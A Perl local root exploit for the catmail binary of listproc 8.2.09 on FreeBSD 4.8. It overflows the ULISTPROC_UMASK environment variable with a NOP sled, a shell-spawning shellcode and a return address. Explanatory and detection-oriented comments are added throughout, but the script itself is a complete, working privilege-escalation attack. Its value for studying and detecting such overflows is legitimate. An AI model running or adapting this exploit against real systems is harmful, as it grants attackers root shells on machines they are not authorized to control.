#!/usr/bin/perl -w
# DSR-listproc.pl - kokaninATdtors.net vs. listproc 8.2.09 (bug found by KF)
# as per http://www.packetstormsecurity.nl/0305-advisories/srt2003-1137.txt
# offset, retaddr and shellcode are for my FreeBSD 4.8-RELEASE, YMMV
# shellcode by eSDee, hello there eSDee
# don't forget to edit the path to the catmail binary
# this yields uid(0) if listproc is installed by root, otherwise something else

# Everything below assembles one oversized string, hands it to the child
# process through the ULISTPROC_UMASK environment variable, and runs catmail.
# Layout of $buffer, in append order: NOP sled, then $shellcode, then two
# copies of the packed address in $ret.
#
# $len is the base size of the sled; because the loop count below subtracts
# (length($shellcode) - 8), the finished $buffer is always $len + 16 bytes.
$len = 16534;
# 'l' packs a native signed 32-bit long, so the address is emitted in host
# byte order (little-endian on the x86 FreeBSD 4.8 box named in the header).
$ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. ½ eye)
# Single x86 NOP byte; repeated by the loop below to form the sled.
$nop = "\x90";                                        
# Payload bytes. Observable markers for an analyst: the ASCII runs
# "\x2f\x2f\x73\x68" ("//sh") and "\x2f\x62\x69\x6e" ("/bin"), and three
# "\xcd\x80" (int 0x80) sequences, i.e. three BSD system calls. Together with
# the header's claim of uid 0 this appears to be a setuid-then-exec-shell
# payload; the exact syscall decoding is not shown here — confirm by
# disassembly if it matters.
$shellcode =    "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
                "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
                "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
                                                      
# Sled: $len - (length($shellcode) - 8) NOPs; with the 37-byte payload above
# that is 16505 bytes. $buffer is never initialised before the first `.=`;
# the append treats undef as "" and -w does not warn about it.
for ($i = 0; $i < $len - (length($shellcode)-8); $i++) {
    $buffer .= $nop;                                  
}                                                     
# Payload immediately follows the sled.
$buffer .= $shellcode;                                
# Two 4-byte copies of the packed address close the buffer.
$buffer .= $ret x 2;                                  
# `local` on a single %ENV element: the child spawned on the next line inherits
# the oversized value. NOTE(review): this variable is presumably the one the
# advisory linked in the header identifies as the overflow vector — confirm
# against that text; the script itself only shows the name being set.
local($ENV{'ULISTPROC_UMASK'}) = $buffer;             
# One-argument system() with no shell metacharacters execs "catmail" directly,
# resolved via PATH unless the full path is substituted as the header advises.
# The script does nothing privileged itself: any uid change comes from how the
# catmail binary is installed (setuid root or not, per the header comment).
# Detection angle: an environment value of ~16 KB consisting almost entirely
# of 0x90 and containing "/bin//sh", handed to a setuid helper, is a strong
# anomaly signal for host-based monitoring.
system("catmail"); 